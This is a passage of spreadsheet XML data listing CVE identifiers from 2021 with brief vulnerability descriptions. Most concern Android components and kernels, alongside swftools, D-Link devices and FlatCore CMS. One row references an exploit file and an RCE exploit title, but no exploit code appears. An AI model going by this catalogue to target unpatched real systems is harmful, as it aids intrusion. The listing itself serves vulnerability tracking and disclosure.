  </si>
  <si>
    <t>CVE-2021-39597</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function code_dump2() located in code.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39598</t>
  </si>
  <si>
    <t>An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function callcode() located in code.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39599</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exists in CXUUCMS 3.1 in the search and c parameters in (1) public/search.php and in the (2) c parameter in admin.php.</t>
  </si>
  <si>
    <t>CVE-2021-3960</t>
  </si>
  <si>
    <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the UpdateServer component of Bitdefender GravityZone allows an attacker to execute arbitrary code on vulnerable instances. This issue affects Bitdefender GravityZone versions prior to 3.3.8.272</t>
  </si>
  <si>
    <t>exploits/php/webapps/50262.py</t>
  </si>
  <si>
    <t>FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)</t>
  </si>
  <si>
    <t>2021-09-06</t>
  </si>
  <si>
    <t>CVE-2021-39602</t>
  </si>
  <si>
    <t>A Buffer Overflow vulnerabilty exists in Miniftpd 1.0 in the do_mkd function in the ftpproto.c file, which could let a remote malicious user cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39608</t>
  </si>
  <si>
    <t>Remote Code Execution (RCE) vulnerabilty exists in FlatCore-CMS 2.0.7 via the upload addon plugin, which could let a remote malicious user exeuct arbitrary php code.</t>
  </si>
  <si>
    <t>CVE-2021-39609</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exiss in FlatCore-CMS 2.0.7 via the upload image function.</t>
  </si>
  <si>
    <t>CVE-2021-3961</t>
  </si>
  <si>
    <t>CVE-2021-39613</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** D-Link DVG-3104MS version 1.0.2.0.3, 1.0.2.0.4, and 1.0.2.0.4E contains hard-coded credentials for undocumented user accounts in the '/etc/passwd' file. As weak passwords have been used, the plaintext passwords can be recovered from the hash values. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-39614</t>
  </si>
  <si>
    <t>D-Link DVX-2000MS contains hard-coded credentials for undocumented user accounts in the '/etc/passwd' file. As weak passwords have been used, the plaintext passwords can be recovered from the hash values.</t>
  </si>
  <si>
    <t>CVE-2021-39615</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** D-Link DSR-500N version 1.02 contains hard-coded credentials for undocumented user accounts in the '/etc/passwd' file.If an attacker succeeds in recovering the cleartext password of the identified hash value, he will be able to log in via SSH or Telnet and thus gain access to the underlying embedded Linux operating system on the device. Fixed in version 2.12/2. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-39616</t>
  </si>
  <si>
    <t>Summary:Product: AndroidVersions: Android SoCAndroid ID: A-204686438</t>
  </si>
  <si>
    <t>CVE-2021-39618</t>
  </si>
  <si>
    <t>In multiple methods of EuiccNotificationManager.java, there is a possible way to install existing packages without user consent due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-196855999</t>
  </si>
  <si>
    <t>CVE-2021-39619</t>
  </si>
  <si>
    <t>In updatePackageMappingsData of UsageStatsService.java, there is a possible way to bypass security and privacy settings of app usage due to an unusual root cause. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-197399948</t>
  </si>
  <si>
    <t>CVE-2021-3962</t>
  </si>
  <si>
    <t>A flaw was found in ImageMagick where it did not properly sanitize certain input before using it to invoke convert processes. This flaw allows an attacker to create a specially crafted image that leads to a use-after-free vulnerability when processed by ImageMagick. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-39620</t>
  </si>
  <si>
    <t>In ipcSetDataReference of Parcel.cpp, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-203847542</t>
  </si>
  <si>
    <t>CVE-2021-39621</t>
  </si>
  <si>
    <t>In sendLegacyVoicemailNotification of LegacyModeSmsHandler.java, there is a possible permissions bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-185126319</t>
  </si>
  <si>
    <t>CVE-2021-39622</t>
  </si>
  <si>
    <t>In GBoard, there is a possible way to bypass Factory Reset Protection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-192663648</t>
  </si>
  <si>
    <t>CVE-2021-39623</t>
  </si>
  <si>
    <t>In doRead of SimpleDecodingSource.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-194105348</t>
  </si>
  <si>
    <t>CVE-2021-39624</t>
  </si>
  <si>
    <t>In PackageManager, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-67862680</t>
  </si>
  <si>
    <t>CVE-2021-39625</t>
  </si>
  <si>
    <t>In showCarrierAppInstallationNotification of EuiccNotificationManager.java, there is a possible way to gain an access to MediaProvider content due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-194695347</t>
  </si>
  <si>
    <t>CVE-2021-39626</t>
  </si>
  <si>
    <t>In onAttach of ConnectedDeviceDashboardFragment.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-194695497</t>
  </si>
  <si>
    <t>CVE-2021-39627</t>
  </si>
  <si>
    <t>In sendLegacyVoicemailNotification of LegacyModeSmsHandler.java, there is a possible permissions bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-185126549</t>
  </si>
  <si>
    <t>CVE-2021-39628</t>
  </si>
  <si>
    <t>In StatusBar.java, there is a possible disclosure of notification content on the lockscreen due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-189575031</t>
  </si>
  <si>
    <t>CVE-2021-39629</t>
  </si>
  <si>
    <t>In phTmlNfc_Init and phTmlNfc_CleanUp of phTmlNfc.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-197353344</t>
  </si>
  <si>
    <t>CVE-2021-3963</t>
  </si>
  <si>
    <t>CVE-2021-39630</t>
  </si>
  <si>
    <t>In executeRequest of OverlayManagerService.java, there is a possible way to control fabricated overlays from adb shell due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-202768292</t>
  </si>
  <si>
    <t>CVE-2021-39631</t>
  </si>
  <si>
    <t>In clear_data_dlg_text of strings.xml, there is a possible situation when "Clear storage" functionality sets up the wrong security/privacy expectations due to a misleading message. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-193890833</t>
  </si>
  <si>
    <t>CVE-2021-39632</t>
  </si>
  <si>
    <t>In inotify_cb of events.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-202159709</t>
  </si>
  <si>
    <t>CVE-2021-39633</t>
  </si>
  <si>
    <t>In gre_handle_offloads of ip_gre.c, there is a possible page fault due to an invalid memory access. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-150694665References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39634</t>
  </si>
  <si>
    <t>In fs/eventpoll.c, there is a possible use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204450605References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39635</t>
  </si>
  <si>
    <t>ims_ex is a vendor system service used to manage VoLTE in unisoc devices?But it does not verify the caller's permissions?so that normal apps (No phone permissions) can obtain some VoLTE sensitive information and manage VoLTE calls.Product: AndroidVersions: Android SoCAndroid ID: A-206492634</t>
  </si>
  <si>
    <t>CVE-2021-39636</t>
  </si>
  <si>
    <t>In do_ipt_get_ctl and do_ipt_set_ctl of ip_tables.c, there is a possible way to leak kernel information due to uninitialized data. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-120612905References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39637</t>
  </si>
  <si>
    <t>In CreateDeviceInfo of trusty_remote_provisioning_context.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-193579873References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39638</t>
  </si>
  <si>
    <t>In periodic_io_work_func of lwis_periodic_io.c, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195607566References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39639</t>
  </si>
  <si>
    <t>In TBD of fvp.c, there is a possible way to glitch CPU behavior due to a missing permission check. This could lead to local escalation of privilege with physical access to device internals with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-198291476References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-3964</t>
  </si>
  <si>
    <t>elgg is vulnerable to Authorization Bypass Through User-Controlled Key</t>
  </si>
  <si>
    <t>CVE-2021-39640</t>
  </si>
  <si>
    <t>In __dwc3_gadget_ep0_queue of ep0.c, there is a possible out of bounds write due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-157294279References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39641</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-126949257References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39642</t>
  </si>
  <si>
    <t>In synchronous_process_io_entries of lwis_ioctl.c, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195731663References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39643</t>
  </si>
  <si>
    <t>In ic_startRetrieveEntryValue of acropora/app/identity/ic.c, there is a possible bypass of defense-in-depth due to missing validation of the return value. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195573629References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39644</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-199809304References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39645</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-199805112References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39646</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-201537251References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39647</t>
  </si>
  <si>
    <t>In mon_smc_load_sp of gs101-sc/plat/samsung/exynos/soc/exynos9845/smc_booting.S, there is a possible reinitialization of TEE due to improper locking. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-198713939References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39648</t>
  </si>
  <si>
    <t>In gadget_dev_desc_UDC_show of configfs.c, there is a possible disclosure of kernel heap memory due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-160822094References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39649</t>
  </si>
  <si>
    <t>In regmap_exit of regmap.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-174049006References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-3965</t>
  </si>
  <si>
    <t>Certain HP DesignJet products may be vulnerable to unauthenticated HTTP requests which allow viewing and downloading of print job previews.</t>
  </si>
  <si>
    <t>CVE-2021-39650</t>
  </si>
  <si>
    <t>In (TBD) of (TBD), there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-169763055References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39651</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible way to access PIN protected settings bypassing PIN confirmation due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-193438173References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39652</t>
  </si>
  <si>
    <t>In sec_ts_parsing_cmds of (TBD), there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-194499021References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39653</t>
  </si>
  <si>
    <t>In (TBD) of (TBD), there is a possible way to boot with a hidden debug policy due to a missing warning to the user. This could lead to local escalation of privilege after preparing the device, hiding the warning, and passing the phone to a new user, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-193443223References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39655</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-192641593References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39656</t>
  </si>
  <si>
    <t>In __configfs_open_file of file.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-174049066References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39657</t>
  </si>
  <si>
    <t>In ufshcd_eh_device_reset_handler of ufshcd.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-194696049References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39658</t>
  </si>
  <si>
    <t>ismsEx service is a vendor service in unisoc equipment?ismsEx service is an extension of sms system service?but it does not check the permissions of the caller?resulting in permission leaks?Third-party apps can use this service to arbitrarily modify and set system properties?Product: AndroidVersions: Android SoCAndroid ID: A-207479207</t>
  </si>
  <si>
    <t>CVE-2021-39659</t>
  </si>
  <si>
    <t>In sortSimPhoneAccountsForEmergency of CreateConnectionProcessor.java, there is a possible prevention of access to emergency calling due to an unhandled exception. In rare instances, this could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-208267659</t>
  </si>
  <si>
    <t>CVE-2021-39661</t>
  </si>
  <si>
    <t>In _PMRLogicalOffsetToPhysicalOffset of the PowerVR kernel driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-246824784</t>
  </si>
  <si>
    <t>CVE-2021-39662</t>
  </si>
  <si>
    <t>In checkUriPermission of MediaProvider.java , there is a possible way to gain access to the content of media provider collections due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-197302116</t>
  </si>
  <si>
    <t>CVE-2021-39663</t>
  </si>
  <si>
    <t>In openFileAndEnforcePathPermissionsHelper of MediaProvider.java, there is a possible bypass of a permissions check due to a confused deputy. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-200682135</t>
  </si>
  <si>
    <t>CVE-2021-39664</t>
  </si>
  <si>
    <t>In LoadedPackage::Load of LoadedArsc.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure when parsing an APK file with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-203938029</t>
  </si>
  <si>
    <t>CVE-2021-39665</t>
  </si>
  <si>
    <t>In checkSpsUpdated of AAVCAssembler.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-204077881</t>
  </si>
  <si>
    <t>CVE-2021-39666</t>
  </si>
  <si>
    <t>In extract of MediaMetricsItem.h, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-204445255</t>
  </si>
  <si>
    <t>CVE-2021-39667</t>
  </si>
  <si>
    <t>In ih264d_parse_decode_slice of ih264d_parse_slice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-205702093</t>
  </si>
  <si>
    <t>CVE-2021-39668</t>
  </si>
  <si>
    <t>In onActivityViewReady of DetailDialog.kt, there is a possible Intent Redirect due to a confused deputy. This could lead to local escalation of privilege that allows actions performed as the System UI, with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-193445603</t>
  </si>
  <si>
    <t>CVE-2021-39669</t>
  </si>
  <si>
    <t>In onCreate of InstallCaCertificateWarning.java, there is a possible way to mislead an user about CA installation circumstances due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-196969991</t>
  </si>
  <si>
    <t>CVE-2021-3967</t>
  </si>
  <si>
    <t>Improper Access Control in GitHub repository zulip/zulip prior to 4.10.</t>
  </si>
  <si>
    <t>CVE-2021-39670</t>
  </si>
  <si>
    <t>In setStream of WallpaperManager.java, there is a possible way to cause a permanent DoS due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-204087139</t>
  </si>
  <si>
    <t>CVE-2021-39671</t>
  </si>
  <si>
    <t>In code generated by aidl_const_expressions.cpp, there is a possible out of bounds read due to uninitialized data. This could lead to information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206718630</t>
  </si>
  <si>
    <t>CVE-2021-39672</t>
  </si>
  <si>
    <t>In fastboot, there is a possible secure boot bypass due to a configuration error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android SoC Android ID: A-202018701</t>
  </si>
  <si>
    <t>CVE-2021-39674</t>
  </si>
  <si>
    <t>In btm_sec_connected and btm_sec_disconnected of btm_sec.cc file , there is a possible use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-201083442</t>
  </si>
  <si>
    <t>CVE-2021-39675</t>
  </si>
  <si>
    <t>In GKI_getbuf of gki_buffer.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-205729183</t>
  </si>
  <si>
    <t>CVE-2021-39676</t>
  </si>
  <si>
    <t>In writeThrowable of AndroidFuture.java, there is a possible parcel serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-197228210</t>
  </si>
  <si>
    <t>CVE-2021-39677</t>
  </si>
  <si>
    <t>In startVideoStream() there is a possibility of an OOB Read in the heap, when the camera buffer is ‘zero’ in size.Product: AndroidVersions: Android-11Android ID: A-205097028</t>
  </si>
  <si>
    <t>CVE-2021-39678</t>
  </si>
  <si>
    <t>In &lt;TBD&gt; of &lt;TBD&gt;, there is a possible bypass of Factory Reset Protection due to &lt;TBD&gt;. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-171742549References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39679</t>
  </si>
  <si>
    <t>In init of vendor_graphicbuffer_meta.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-188745089References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-3968</t>
  </si>
  <si>
    <t>CVE-2021-39680</t>
  </si>
  <si>
    <t>In sec_SHA256_Transform of sha256_core.c, there is a possible way to read heap data due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-197965864References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39681</t>
  </si>
  <si>
    <t>In delete_protocol of main.c, there is a possible arbitrary code execution due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-200251074References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39682</t>
  </si>
  <si>
    <t>In mgm_alloc_page of memory_group_manager.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-201677538References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39683</t>
  </si>
  <si>
    <t>In copy_from_mbox of sss_ice_util.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-202003354References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39684</t>
  </si>
  <si>
    <t>In target_init of gs101/abl/target/slider/target.c, there is a possible allocation of RWX memory due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-203250788References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39685</t>
  </si>
  <si>
    <t>In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39686</t>
  </si>
  <si>
    <t>In several functions of binder.c, there is a possible way to represent the wrong domain to SELinux due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-200688826References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39687</t>
  </si>
  <si>
    <t>In HandleTransactionIoEvent of actuator_driver.cc, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204421047References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39688</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible out of bounds read due to TBD. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206039140References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39689</t>
  </si>
  <si>
    <t>In multiple functions of odsign_main.cpp, there is a possible way to persist system attack due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206090748</t>
  </si>
  <si>
    <t>CVE-2021-3969</t>
  </si>
  <si>
    <t>A Time of Check Time of Use (TOCTOU) vulnerability was reported in IMController, a software component of Lenovo System Interface Foundation, prior to version 1.1.20.3that could allow a local attacker to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-39690</t>
  </si>
  <si>
    <t>In setDisplayPadding of WallpaperManagerService.java, there is a possible way to cause a persistent DoS due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-204316511</t>
  </si>
  <si>
    <t>CVE-2021-39691</t>
  </si>
  <si>
    <t>In WindowManager, there is a possible tapjacking attack due to an incorrect window flag when processing user input. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-157929241</t>
  </si>
  <si>
    <t>CVE-2021-39692</t>
  </si>
  <si>
    <t>In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209611539</t>
  </si>
  <si>
    <t>CVE-2021-39693</t>
  </si>
  <si>
    <t>In onUidStateChanged of AppOpsService.java, there is a possible way to access location without a visible indicator due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208662370</t>
  </si>
  <si>
    <t>CVE-2021-39694</t>
  </si>
  <si>
    <t>In parse of RoleParser.java, there is a possible way for default apps to get permissions explicitly denied by the user due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-202312327</t>
  </si>
  <si>
    <t>CVE-2021-39695</t>
  </si>
  <si>
    <t>In createOrUpdate of BasePermission.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-209607944</t>
  </si>
  <si>
    <t>CVE-2021-39696</t>
  </si>
  <si>
    <t>In Task.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-185810717</t>
  </si>
  <si>
    <t>CVE-2021-39697</t>
  </si>
  <si>
    <t>In checkFileUriDestination of DownloadProvider.java, there is a possible way to bypass external storage private directories protection due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-200813547</t>
  </si>
  <si>
    <t>CVE-2021-39698</t>
  </si>
  <si>
    <t>In aio_poll_complete_work of aio.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-185125206References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-3970</t>
  </si>
  <si>
    <t>A potential vulnerability in LenovoVariable SMI Handler due to insufficient validation in some Lenovo Notebook models BIOS may allow an attacker with local access and elevated privileges to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-39700</t>
  </si>
  <si>
    <t>In the policies of adbd.te, there was a logic error which caused the CTS Listening Ports Test to report invalid results. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-201645790</t>
  </si>
  <si>
    <t>CVE-2021-39701</t>
  </si>
  <si>
    <t>In serviceConnection of ControlsProviderLifecycleManager.kt, there is a possible way to keep service running in foreground without notification or permission due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-212286849</t>
  </si>
  <si>
    <t>CVE-2021-39702</t>
  </si>
  <si>
    <t>In onCreate of RequestManageCredentials.java, there is a possible way for a third party app to install certificates without user approval due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-205150380</t>
  </si>
  <si>
    <t>CVE-2021-39703</t>
  </si>
  <si>
    <t>In updateState of UsbDeviceManager.java, there is a possible unauthorized access of files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-207057578</t>
  </si>
  <si>
    <t>CVE-2021-39704</t>
  </si>
  <si>
